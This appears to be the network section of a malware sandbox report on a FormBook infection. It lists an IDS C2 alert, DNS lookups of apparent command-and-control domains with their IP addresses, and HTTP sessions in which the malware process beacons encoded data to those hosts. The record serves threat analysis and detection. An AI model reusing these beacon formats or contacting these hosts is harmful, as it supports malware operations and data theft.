2024-09-12T13:05:00.602958+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49749 | 43.242.202.169 | 80 | TCP
                    TimestampSource PortDest PortSource IPDest IP
                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                    Sep 12, 2024 13:02:33.774221897 CEST | 53183 | 53 | 192.168.2.5 | 1.1.1.1
                    Sep 12, 2024 13:02:33.783813953 CEST | 53 | 53183 | 1.1.1.1 | 192.168.2.5
                    Sep 12, 2024 13:02:38.798022032 CEST | 57603 | 53 | 192.168.2.5 | 1.1.1.1
                    Sep 12, 2024 13:02:38.812272072 CEST | 53 | 57603 | 1.1.1.1 | 192.168.2.5
                    Sep 12, 2024 13:02:54.765254021 CEST | 50274 | 53 | 192.168.2.5 | 1.1.1.1
                    Sep 12, 2024 13:02:54.816309929 CEST | 53 | 50274 | 1.1.1.1 | 192.168.2.5
                    Sep 12, 2024 13:03:08.109097004 CEST | 55674 | 53 | 192.168.2.5 | 1.1.1.1
                    Sep 12, 2024 13:03:08.119434118 CEST | 53 | 55674 | 1.1.1.1 | 192.168.2.5
                    Sep 12, 2024 13:03:16.171837091 CEST | 54098 | 53 | 192.168.2.5 | 1.1.1.1
                    Sep 12, 2024 13:03:16.351845026 CEST | 53 | 54098 | 1.1.1.1 | 192.168.2.5
                    Sep 12, 2024 13:03:29.953356981 CEST | 62494 | 53 | 192.168.2.5 | 1.1.1.1
                    Sep 12, 2024 13:03:30.163310051 CEST | 53 | 62494 | 1.1.1.1 | 192.168.2.5
                    Sep 12, 2024 13:03:43.565097094 CEST | 61955 | 53 | 192.168.2.5 | 1.1.1.1
                    Sep 12, 2024 13:03:43.621608973 CEST | 53 | 61955 | 1.1.1.1 | 192.168.2.5
                    Sep 12, 2024 13:03:56.969422102 CEST | 59035 | 53 | 192.168.2.5 | 1.1.1.1
                    Sep 12, 2024 13:03:56.991231918 CEST | 53 | 59035 | 1.1.1.1 | 192.168.2.5
                    Sep 12, 2024 13:04:10.266396999 CEST | 59396 | 53 | 192.168.2.5 | 1.1.1.1
                    Sep 12, 2024 13:04:10.466754913 CEST | 53 | 59396 | 1.1.1.1 | 192.168.2.5
                    Sep 12, 2024 13:04:23.758407116 CEST | 60906 | 53 | 192.168.2.5 | 1.1.1.1
                    Sep 12, 2024 13:04:24.019242048 CEST | 53 | 60906 | 1.1.1.1 | 192.168.2.5
                    Sep 12, 2024 13:04:37.738338947 CEST | 58210 | 53 | 192.168.2.5 | 1.1.1.1
                    Sep 12, 2024 13:04:37.761276960 CEST | 53 | 58210 | 1.1.1.1 | 192.168.2.5
                    Sep 12, 2024 13:04:51.032418966 CEST | 50782 | 53 | 192.168.2.5 | 1.1.1.1
                    Sep 12, 2024 13:04:51.935170889 CEST | 53 | 50782 | 1.1.1.1 | 192.168.2.5
                    Sep 12, 2024 13:05:05.999725103 CEST | 62441 | 53 | 192.168.2.5 | 1.1.1.1
                    Sep 12, 2024 13:05:06.011758089 CEST | 53 | 62441 | 1.1.1.1 | 192.168.2.5
                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                    Sep 12, 2024 13:02:33.774221897 CEST | 192.168.2.5 | 1.1.1.1 | 0xf80f | Standard query (0) | www.monos.shop | A (IP address) | IN (0x0001) | false
                    Sep 12, 2024 13:02:38.798022032 CEST | 192.168.2.5 | 1.1.1.1 | 0xcda3 | Standard query (0) | www.726075.buzz | A (IP address) | IN (0x0001) | false
                    Sep 12, 2024 13:02:54.765254021 CEST | 192.168.2.5 | 1.1.1.1 | 0x8015 | Standard query (0) | www.freepicture.online | A (IP address) | IN (0x0001) | false
                    Sep 12, 2024 13:03:08.109097004 CEST | 192.168.2.5 | 1.1.1.1 | 0x33de | Standard query (0) | www.318st.com | A (IP address) | IN (0x0001) | false
                    Sep 12, 2024 13:03:16.171837091 CEST | 192.168.2.5 | 1.1.1.1 | 0x5809 | Standard query (0) | www.hm62t.top | A (IP address) | IN (0x0001) | false
                    Sep 12, 2024 13:03:29.953356981 CEST | 192.168.2.5 | 1.1.1.1 | 0x191 | Standard query (0) | www.golbasi-nakliyat.xyz | A (IP address) | IN (0x0001) | false
                    Sep 12, 2024 13:03:43.565097094 CEST | 192.168.2.5 | 1.1.1.1 | 0x4ca0 | Standard query (0) | www.mfgamecompany.shop | A (IP address) | IN (0x0001) | false
                    Sep 12, 2024 13:03:56.969422102 CEST | 192.168.2.5 | 1.1.1.1 | 0xf7a9 | Standard query (0) | www.quilo.life | A (IP address) | IN (0x0001) | false
                    Sep 12, 2024 13:04:10.266396999 CEST | 192.168.2.5 | 1.1.1.1 | 0x5f96 | Standard query (0) | www.qiluqiyuan.buzz | A (IP address) | IN (0x0001) | false
                    Sep 12, 2024 13:04:23.758407116 CEST | 192.168.2.5 | 1.1.1.1 | 0xa54d | Standard query (0) | www.bola88site.one | A (IP address) | IN (0x0001) | false
                    Sep 12, 2024 13:04:37.738338947 CEST | 192.168.2.5 | 1.1.1.1 | 0xa1c9 | Standard query (0) | www.kckartal.xyz | A (IP address) | IN (0x0001) | false
                    Sep 12, 2024 13:04:51.032418966 CEST | 192.168.2.5 | 1.1.1.1 | 0x3fb2 | Standard query (0) | www.mizuquan.top | A (IP address) | IN (0x0001) | false
                    Sep 12, 2024 13:05:05.999725103 CEST | 192.168.2.5 | 1.1.1.1 | 0xcd3b | Standard query (0) | www.kxshopmr.store | A (IP address) | IN (0x0001) | false
                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                    Sep 12, 2024 13:02:33.783813953 CEST | 1.1.1.1 | 192.168.2.5 | 0xf80f | Name error (3) | www.monos.shop | none | none | A (IP address) | IN (0x0001) | false
                    Sep 12, 2024 13:02:38.812272072 CEST | 1.1.1.1 | 192.168.2.5 | 0xcda3 | No error (0) | www.726075.buzz |  | 47.57.185.227 | A (IP address) | IN (0x0001) | false
                    Sep 12, 2024 13:02:54.816309929 CEST | 1.1.1.1 | 192.168.2.5 | 0x8015 | No error (0) | www.freepicture.online | freepicture.online |  | CNAME (Canonical name) | IN (0x0001) | false
                    Sep 12, 2024 13:02:54.816309929 CEST | 1.1.1.1 | 192.168.2.5 | 0x8015 | No error (0) | freepicture.online |  | 89.58.49.1 | A (IP address) | IN (0x0001) | false
                    Sep 12, 2024 13:03:08.119434118 CEST | 1.1.1.1 | 192.168.2.5 | 0x33de | Name error (3) | www.318st.com | none | none | A (IP address) | IN (0x0001) | false
                    Sep 12, 2024 13:03:16.351845026 CEST | 1.1.1.1 | 192.168.2.5 | 0x5809 | No error (0) | www.hm62t.top | hm62t.top |  | CNAME (Canonical name) | IN (0x0001) | false
                    Sep 12, 2024 13:03:16.351845026 CEST | 1.1.1.1 | 192.168.2.5 | 0x5809 | No error (0) | hm62t.top |  | 154.23.184.240 | A (IP address) | IN (0x0001) | false
                    Sep 12, 2024 13:03:30.163310051 CEST | 1.1.1.1 | 192.168.2.5 | 0x191 | No error (0) | www.golbasi-nakliyat.xyz | redirect.natrocdn.com |  | CNAME (Canonical name) | IN (0x0001) | false
                    Sep 12, 2024 13:03:30.163310051 CEST | 1.1.1.1 | 192.168.2.5 | 0x191 | No error (0) | redirect.natrocdn.com | natroredirect.natrocdn.com |  | CNAME (Canonical name) | IN (0x0001) | false
                    Sep 12, 2024 13:03:30.163310051 CEST | 1.1.1.1 | 192.168.2.5 | 0x191 | No error (0) | natroredirect.natrocdn.com |  | 85.159.66.93 | A (IP address) | IN (0x0001) | false
                    Sep 12, 2024 13:03:43.621608973 CEST | 1.1.1.1 | 192.168.2.5 | 0x4ca0 | No error (0) | www.mfgamecompany.shop | mfgamecompany.shop |  | CNAME (Canonical name) | IN (0x0001) | false
                    Sep 12, 2024 13:03:43.621608973 CEST | 1.1.1.1 | 192.168.2.5 | 0x4ca0 | No error (0) | mfgamecompany.shop |  | 185.173.111.76 | A (IP address) | IN (0x0001) | false
                    Sep 12, 2024 13:03:56.991231918 CEST | 1.1.1.1 | 192.168.2.5 | 0xf7a9 | No error (0) | www.quilo.life |  | 203.161.43.228 | A (IP address) | IN (0x0001) | false
                    Sep 12, 2024 13:04:10.466754913 CEST | 1.1.1.1 | 192.168.2.5 | 0x5f96 | No error (0) | www.qiluqiyuan.buzz |  | 161.97.168.245 | A (IP address) | IN (0x0001) | false
                    Sep 12, 2024 13:04:24.019242048 CEST | 1.1.1.1 | 192.168.2.5 | 0xa54d | No error (0) | www.bola88site.one | bola88site.one |  | CNAME (Canonical name) | IN (0x0001) | false
                    Sep 12, 2024 13:04:24.019242048 CEST | 1.1.1.1 | 192.168.2.5 | 0xa54d | No error (0) | bola88site.one |  | 172.96.191.39 | A (IP address) | IN (0x0001) | false
                    Sep 12, 2024 13:04:37.761276960 CEST | 1.1.1.1 | 192.168.2.5 | 0xa1c9 | No error (0) | www.kckartal.xyz |  | 104.21.20.125 | A (IP address) | IN (0x0001) | false
                    Sep 12, 2024 13:04:37.761276960 CEST | 1.1.1.1 | 192.168.2.5 | 0xa1c9 | No error (0) | www.kckartal.xyz |  | 172.67.192.227 | A (IP address) | IN (0x0001) | false
                    Sep 12, 2024 13:04:51.935170889 CEST | 1.1.1.1 | 192.168.2.5 | 0x3fb2 | No error (0) | www.mizuquan.top |  | 43.242.202.169 | A (IP address) | IN (0x0001) | false
                    Sep 12, 2024 13:05:06.011758089 CEST | 1.1.1.1 | 192.168.2.5 | 0xcd3b | Name error (3) | www.kxshopmr.store | none | none | A (IP address) | IN (0x0001) | false
                    • www.726075.buzz
                    • www.freepicture.online
                    • www.hm62t.top
                    • www.golbasi-nakliyat.xyz
                    • www.mfgamecompany.shop
                    • www.quilo.life
                    • www.qiluqiyuan.buzz
                    • www.bola88site.one
                    • www.kckartal.xyz
                    • www.mizuquan.top
                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    0 | 192.168.2.5 | 49711 | 47.57.185.227 | 80 | 4444 | C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 12, 2024 13:02:38.835670948 CEST | 458 | OUT | GET /w9nd/?nR=9dRK0h7YIJsGSRni8bUofvVG/PCfrhvBPHBwJCn+XP7nQ6BgyCo2QTTghBp7CnsQKe5GALi32E4BE+loUVZtsDQ0fsSUzmOhwAoGTPqsz12jBMJXijf4AdQEcpHIqPDRWg==&OJ=btRp HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Language: en-US,en
                    Host: www.726075.buzz
                    Connection: close
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Sep 12, 2024 13:02:39.719141960 CEST | 302 | IN | HTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Thu, 12 Sep 2024 11:02:39 GMT
                    Content-Type: text/html
                    Content-Length: 138
                    Connection: close
                    ETag: "6663edd0-8a"
                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    1 | 192.168.2.5 | 49712 | 89.58.49.1 | 80 | 4444 | C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 12, 2024 13:02:54.834352970 CEST | 742 | OUT | POST /xcfw/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en
                    Host: www.freepicture.online
                    Origin: http://www.freepicture.online
                    Referer: http://www.freepicture.online/xcfw/
                    Content-Type: application/x-www-form-urlencoded
                    Connection: close
                    Content-Length: 203
                    Cache-Control: max-age=0
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Data Raw: 6e 52 3d 57 68 2b 56 47 4e 75 4c 42 49 59 61 2f 41 4b 70 77 30 4d 37 4f 6c 64 39 75 71 6d 31 79 5a 56 70 4d 72 46 4a 79 57 45 2f 33 56 38 2f 48 55 66 4d 32 48 49 44 34 59 63 63 73 61 6d 77 58 72 2b 64 47 58 4c 41 49 58 57 79 4b 44 35 39 74 68 51 36 43 47 78 75 71 79 2f 44 46 64 35 54 66 74 4b 42 6d 69 50 54 46 43 31 68 33 61 39 46 69 43 67 34 58 57 55 57 31 41 77 4a 38 68 48 56 54 31 4b 36 31 49 59 37 58 61 78 34 69 2b 6d 44 49 78 30 58 4a 57 52 6b 58 72 58 72 6e 6f 77 2b 5a 45 53 6c 71 4b 54 4e 6f 51 52 43 72 45 71 4f 72 64 68 6e 39 6a 56 52 37 71 69 76 42 79 66 38 43 37 72 65 76 76 57 46 70 32 38 3d
                    Data Ascii: nR=Wh+VGNuLBIYa/AKpw0M7Old9uqm1yZVpMrFJyWE/3V8/HUfM2HID4YccsamwXr+dGXLAIXWyKD59thQ6CGxuqy/DFd5TftKBmiPTFC1h3a9FiCg4XWUW1AwJ8hHVT1K61IY7Xax4i+mDIx0XJWRkXrXrnow+ZESlqKTNoQRCrEqOrdhn9jVR7qivByf8C7revvWFp28=
                    Sep 12, 2024 13:02:55.453418970 CEST | 360 | IN | HTTP/1.1 404 Not Found
                    Date: Thu, 12 Sep 2024 11:02:55 GMT
                    Server: Apache
                    Content-Length: 196
                    Connection: close
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    2 | 192.168.2.5 | 49714 | 89.58.49.1 | 80 | 4444 | C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 12, 2024 13:02:57.372428894 CEST | 762 | OUT | POST /xcfw/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en
                    Host: www.freepicture.online
                    Origin: http://www.freepicture.online
                    Referer: http://www.freepicture.online/xcfw/
                    Content-Type: application/x-www-form-urlencoded
                    Connection: close
                    Content-Length: 223
                    Cache-Control: max-age=0
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Data Raw: 6e 52 3d 57 68 2b 56 47 4e 75 4c 42 49 59 61 2b 6a 53 70 39 30 77 37 5a 31 64 36 72 71 6d 31 34 35 56 6c 4d 72 42 4a 79 53 64 30 33 47 59 2f 48 32 58 4d 33 43 6b 44 31 34 63 63 34 4b 6d 31 5a 4c 2b 44 47 58 48 69 49 53 32 79 4b 44 39 39 74 67 67 36 43 33 78 70 6f 69 2f 46 44 64 35 52 52 4e 4b 42 6d 69 50 54 46 43 68 48 33 61 6c 46 69 78 34 34 58 33 55 52 32 41 77 4b 37 68 48 56 5a 56 4c 53 31 49 5a 75 58 66 56 65 69 38 65 44 49 78 6b 58 4a 69 39 6e 65 72 58 70 74 49 78 37 55 6e 76 4b 6a 61 66 64 6e 43 45 36 2b 48 32 4f 6e 4c 4d 4e 6e 42 64 35 6f 4b 4f 58 52 68 58 4c 54 4c 4b 33 31 4d 47 31 33 68 71 30 74 67 4a 6c 66 46 77 79 49 4c 79 61 4c 68 49 62 76 56 46 64
                    Data Ascii: nR=Wh+VGNuLBIYa+jSp90w7Z1d6rqm145VlMrBJySd03GY/H2XM3CkD14cc4Km1ZL+DGXHiIS2yKD99tgg6C3xpoi/FDd5RRNKBmiPTFChH3alFix44X3UR2AwK7hHVZVLS1IZuXfVei8eDIxkXJi9nerXptIx7UnvKjafdnCE6+H2OnLMNnBd5oKOXRhXLTLK31MG13hq0tgJlfFwyILyaLhIbvVFd
                    Sep 12, 2024 13:02:58.013906002 CEST | 360 | IN | HTTP/1.1 404 Not Found
                    Date: Thu, 12 Sep 2024 11:02:57 GMT
                    Server: Apache
                    Content-Length: 196
                    Connection: close
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    3 | 192.168.2.5 | 49715 | 89.58.49.1 | 80 | 4444 | C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 12, 2024 13:02:59.938705921 CEST | 1779 | OUT | POST /xcfw/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en
                    Host: www.freepicture.online
                    Origin: http://www.freepicture.online
                    Referer: http://www.freepicture.online/xcfw/
                    Content-Type: application/x-www-form-urlencoded
                    Connection: close
                    Content-Length: 1239
                    Cache-Control: max-age=0
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Data Raw: 6e 52 3d 57 68 2b 56 47 4e 75 4c 42 49 59 61 2b 6a 53 70 39 30 77 37 5a 31 64 36 72 71 6d 31 34 35 56 6c 4d 72 42 4a 79 53 64 30 33 47 51 2f 48 6a 62 4d 32 6c 51 44 30 34 63 63 37 4b 6d 30 5a 4c 2f 47 47 58 76 6d 49 53 71 49 4b 42 31 39 74 43 6f 36 56 79 52 70 69 69 2f 46 42 64 35 4d 66 74 4c 62 6d 69 66 4d 46 43 78 48 33 61 6c 46 69 33 55 34 65 47 55 52 77 41 77 4a 38 68 48 5a 54 31 4b 2f 31 49 51 56 58 65 55 6c 6a 4e 2b 44 49 56 34 58 61 6e 52 6e 52 72 58 6e 71 49 78 64 55 6e 6a 56 6a 61 44 52 6e 44 77 63 2b 48 65 4f 6b 38 4a 50 79 68 52 42 39 72 36 6e 42 67 57 33 4e 2f 47 52 7a 38 47 44 39 42 79 78 6b 79 6c 30 63 31 63 47 65 37 6a 71 5a 6e 45 72 6f 6a 56 63 43 67 79 44 65 4c 71 57 34 4d 36 79 2b 70 34 34 52 51 4a 63 33 31 6a 65 4e 4c 38 54 72 79 4c 76 35 31 6b 6f 78 50 62 51 66 4c 6f 73 5a 7a 32 68 72 37 4c 55 5a 4a 54 68 55 4c 4e 43 49 41 34 48 59 6b 75 48 45 34 41 6e 2f 4d 33 36 55 56 61 69 61 58 4a 2b 62 70 65 4a 49 37 6d 38 78 39 76 43 4f 45 4e 34 45 4f 36 6e 51 75 46 77 6e 4f 32 43 41 42 6b [TRUNCATED]
                    Data Ascii: nR=[TRUNCATED]
                    Sep 12, 2024 13:03:00.542438984 CEST | 360 | IN | HTTP/1.1 404 Not Found
                    Date: Thu, 12 Sep 2024 11:03:00 GMT
                    Server: Apache
                    Content-Length: 196
                    Connection: close
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    4 | 192.168.2.5 | 49716 | 89.58.49.1 | 80 | 4444 | C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 12, 2024 13:03:02.483143091 CEST | 465 | OUT | GET /xcfw/?nR=bjW1F6zberoR1D3bw3FdYWJ+vrSF97RpHttayncOl0oweWLXznwX2+g7zIG3cvz9HU+qZyWIdkFY93Q5IGFA2CDhFv5wQZ64tx6dBz0c4KNQxRUIYxJE7HIG/DzEWEHYrw==&OJ=btRp HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Language: en-US,en
                    Host: www.freepicture.online
                    Connection: close
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Sep 12, 2024 13:03:03.101243019 CEST | 360 | IN | HTTP/1.1 404 Not Found
                    Date: Thu, 12 Sep 2024 11:03:03 GMT
                    Server: Apache
                    Content-Length: 196
                    Connection: close
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    5 | 192.168.2.5 | 49717 | 154.23.184.240 | 80 | 4444 | C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 12, 2024 13:03:16.373815060 CEST | 715 | OUT | POST /p39s/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en
                    Host: www.hm62t.top
                    Origin: http://www.hm62t.top
                    Referer: http://www.hm62t.top/p39s/
                    Content-Type: application/x-www-form-urlencoded
                    Connection: close
                    Content-Length: 203
                    Cache-Control: max-age=0
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Data Raw: 6e 52 3d 34 50 56 74 50 32 42 51 67 38 71 7a 68 63 6f 68 45 76 31 4f 2f 71 41 6a 66 4d 41 59 76 34 57 39 52 38 6c 53 70 4a 62 74 48 72 59 61 35 76 64 67 46 76 32 64 48 49 5a 33 4f 77 33 54 4c 45 2f 54 41 41 76 70 50 4c 2f 47 49 41 38 34 30 4f 36 76 71 38 73 30 73 62 4e 44 34 6a 7a 33 48 51 43 65 66 61 54 32 6a 32 33 67 5a 67 66 79 79 50 7a 63 59 56 6c 48 48 4b 69 47 76 52 62 39 4b 6f 5a 61 56 4c 45 4f 4a 43 4f 64 4c 32 76 2b 35 49 56 61 39 69 50 52 55 72 54 74 76 5a 7a 72 56 61 35 52 4d 64 79 6b 52 66 7a 4e 76 72 2f 46 56 75 48 41 54 63 7a 73 6b 46 79 41 45 54 57 67 78 7a 4c 68 62 35 46 69 2f 37 63 3d
                    Data Ascii: nR=4PVtP2BQg8qzhcohEv1O/qAjfMAYv4W9R8lSpJbtHrYa5vdgFv2dHIZ3Ow3TLE/TAAvpPL/GIA840O6vq8s0sbND4jz3HQCefaT2j23gZgfyyPzcYVlHHKiGvRb9KoZaVLEOJCOdL2v+5IVa9iPRUrTtvZzrVa5RMdykRfzNvr/FVuHATczskFyAETWgxzLhb5Fi/7c=
                    Sep 12, 2024 13:03:17.267894983 CEST | 312 | IN | HTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Thu, 12 Sep 2024 11:03:17 GMT
                    Content-Type: text/html
                    Content-Length: 148
                    Connection: close
                    ETag: "66a8e223-94"
                    Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


